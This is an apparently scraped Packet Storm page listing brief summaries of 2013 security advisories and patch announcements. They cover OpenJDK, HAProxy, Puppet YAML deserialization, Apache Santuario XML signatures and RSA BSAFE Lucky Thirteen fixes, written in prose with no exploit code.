RSA BSAFE SSL-C version 2.8.7 contains a patch that is designed to help ensure that MAC checking is time invariant in servers in order to mitigate Lucky Thirteen attacks.
3705ff404e79e528a1d4c4f3b3ef61d1564a3c5b98e8c1e65707ec6fa9ccf3b9Red Hat Security Advisory 2013-0958-01 - These packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Software Development Kit. Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption. Integer overflow flaws were found in the way AWT processed certain input. An attacker could use these flaws to execute arbitrary code with the privileges of the user running an untrusted Java applet or application.
3f77eaf4516bbe12c6edbe2aca993604898a19cfaad97a69e04c200768338d2bRed Hat Security Advisory 2013-0957-01 - These packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Software Development Kit. Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption. Integer overflow flaws were found in the way AWT processed certain input. An attacker could use these flaws to execute arbitrary code with the privileges of the user running an untrusted Java applet or application.
607e92095834e27b38b0876edb3515b60809151352fdfe7243f233f859b32927Debian Linux Security Advisory 2712-1 - It was discovered that users with a valid agent login could use crafted URLs to bypass access control restrictions and read tickets to which they should not have access.
504cb290f51c608d9200e113c25d5724ba25dd33673d69731fea9e871839de69Debian Linux Security Advisory 2711-1 - Multiple security issues have been found in HAProxy, a load-balancing reverse proxy.
319b470e413067c6dfb06e38f3db14e6a31e3cdbf1d418eaedc13bc17f95e217Drupal Login Security third party module versions 6.x and 7.x suffer from bypass and denial of service vulnerabilities.
598061f54bac357e4a742401275a6a32cd65fb79938c18d3b4947c9e8cce8cc3In February 2013, VSR identified a vulnerability in the IBM WebSphere Commerce framework which could allow an attacker to tamper with values stored in the "krypto" URL parameter. This parameter is encrypted with a block cipher without any independent integrity protection. This, combined with observed application behavior, allows for padding oracle attacks which can be used to decrypt the krypto token and forge new tokens with arbitrary embedded parameters.
5998d6a975a57dc3921286cababdc5aa780a65141183d9726f3d8938c1392707RSA BSAFE SSL-J 6.0.1 and 5.1.2 contain updates designed to prevent BEAST attacks and SSL/TLS Plaintext Recovery (aka Lucky Thirteen) attacks.
c4c500343555b143f39e0055e4ce990a4e2809cae8e525b10d41140c0a9e374eResearchers have discovered a weakness in the handling of CBC cipher suites in SSL, TLS and DTLS for RSA BSAFE Micro Edition Suite for all versions outside of 4.0.3 and 3.2.5. The Lucky Thirteen attack exploits timing differences arising during MAC processing. Vulnerable implementations do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.
63d67971616d756f9a24527aece917f871801037a08e76de35be02323baa702aTechnical Cyber Security Alert 2013-169A - Oracle released the June 2013 Critical Patch Update for Oracle Java SE. This patch contains 40 new security fixes across Java SE products and a fix to the Javadoc Tool. API documentation in HTML format generated by the Javadoc tool that contains a right frame may be vulnerable to frame injection when hosted on a web server.
a41aca8835ee3499199ea44a2b84c6181c92e3efce36d2da65f6daf2fd76c218Facebook appears to suffer from a critical design flaw in how users share photos using a URI. Once a URI is known the only action the user can take to hide the contents of a photo album is to delete the album. This means if you ever have a breach, be it someone sitting in front of your computer, or getting your Facebook password, you must delete all your photo albums to keep the contents private.
0a29cfeb80463cd152ef5b3f1d86ba9355c1a6664476d861f177f8a3a82b52faDebian Linux Security Advisory 2628-2 - The security update DSA-2628 for nss-pam-ldapd failed to build on kfreebsd-amd64 and kfreebsd-i386.
ca04431f7098338d92f01c30b2b14d94f107aed5b83c0e5d0a566ae308c1550aDebian Linux Security Advisory 2698-1 - Multiple issues were discovered in the TIFF tools, a set of utilities for TIFF image file manipulation and conversion.
2d2368ecc0f7d48d6b7d6ddde98b2ad8db9e4da5cfa9209da669bc81c6a219dbUbuntu Security Notice 1886-1 - It was discovered that Puppet incorrectly handled YAML payloads. An attacker on an untrusted client could use this issue to execute arbitrary code on the master.
eb685b156838671fe79b419fa87ca1d86032de2006cbe1d74ccf0cf26603bd9eWhen making REST api calls, the puppet master takes YAML from an untrusted client, deserializes it, and then calls methods on the resulting object. A YAML payload can be crafted to cause the deserialization to construct an instance of any class available in the ruby process, which allows an attacker to execute code contained in the payload.
4331f8a7741c008aa390b37694c2381491f1dd083ba0a9941ebaf7a62f36e8acFreeBSD Security Advisory - Due to insufficient permission checks in the virtual memory system, a tracing process (such as a debugger) may be able to modify portions of the traced process's address space to which the traced process itself does not have write access. This error can be exploited to allow unauthorized modification of an arbitrary file to which the attacker has read access, but not write access. Depending on the file and the nature of the modifications, this can result in privilege escalation. To exploit this vulnerability, an attacker must be able to run arbitrary code with user privileges on the target system.
46c9d0684ffdd8c4787e60e14015a9e757b66b443d2622296e77fbdbc855860aThe implementation of XML digital signatures in the Santuario-C++ library is vulnerable to a spoofing issue allowing an attacker to reuse existing signatures with arbitrary content. The vulnerability affects only applications that do not perform proper checking/analysis of the content of the Reference elements in the Signature, but the bug exacerbates this problem by opening such applications to attacks using arbitrary content, instead of just attacks involving malicious, but signed, content. Versions prior to 1.7.1 are affected.
f4cc52eebffe98291d0852b7719520ff57e20f3844e5293b69e302a109d1c520Technical Cyber Security Alert 2013-168A - Select Microsoft software products contain multiple vulnerabilities. Microsoft has released updates to address these vulnerabilities.
cf7f30c9457212d92f6b62a38f0d54e3832e152a6b96e1732817a0a55735ef2cUbuntu Security Notice 1884-1 - It was discovered that LibRaw incorrectly handled broken full-color images. If a user or automated system were tricked into processing a specially crafted raw image, applications linked against LibRaw could be made to crash, resulting in a denial of service, or possibly execute arbitrary code.
af2f3c18279a4d4ad6d10e905a3caf640120ee29feebb1726755729b0ffba8bdUbuntu Security Notice 1885-1 - It was discovered that libKDcraw incorrectly handled broken full-color images. If a user or automated system were tricked into processing a specially crafted raw image, applications linked against libKDcraw could be made to crash, resulting in a denial of service, or possibly execute arbitrary code.
745dd16e66aaa77d962d55ef226b8a36fe3d76733bda43245338ea5d58832c7aDebian Linux Security Advisory 2710-1 - James Forshaw from Context Information Security discovered several vulnerabilities in xml-security-c, an implementation of the XML Digital Security specification.
9115a6092e44a563c15e997a4b11c3f9292f19c14422c4354bf87e64e409defaRed Hat Security Advisory 2013-0953-01 - Red Hat JBoss Portal is the open source implementation of the Java EE suite of services and Portal services running atop Red Hat JBoss Enterprise Application Platform. JBoss Web Services leaked side-channel data when distributing symmetric keys, allowing a remote attacker to recover the entire plain text form of a symmetric key. Spring framework could possibly evaluate Expression Language expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server.
4f9e2960fda4e62a5f6b93721a0f7321b3180fe0d9a8f7f628aa10ee6222b1c2Apple Security Advisory 2013-06-18-1 - Java for OS X 2013-004 and Mac OS X v10.6 Update 16 are now available and addresses multiple vulnerabilities that include arbitrary code execution issues.
f8e9f7d76bd910c50d277b999c12859be24a831c1a38b126a92577609223f014A heap overflow exists in the processing of the PrefixList attribute optionally used in conjunction with Exclusive Canonicalization, potentially allowing arbitrary code execution. If verification of the signature occurs prior to actual evaluation of a signing key, this could be exploited by an unauthenticated attacker. Apache Santuario XML Security for C++ library versions prior to 1.7.1 are affected.
8d2ae10fa63742af710c4959f5b09bc760cf1e6de68ca6c11e5d303b15106ce4A bug exists in the processing of the output length of an HMAC-based XML Signature that would cause a denial of service when processing specially chosen input. Exploitation of this issue does not require authenticated content. In very unusual cases, inputs could be chosen in such a way that the fix for the issue in CVE-2009-0217 could be bypassed, enabling improper verification of a signature. Versions prior to 1.7.1 are affected.
4ed699c9710bffc9e07a34e7f30bd97e55b2305af63662dc2f499d685d727662
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed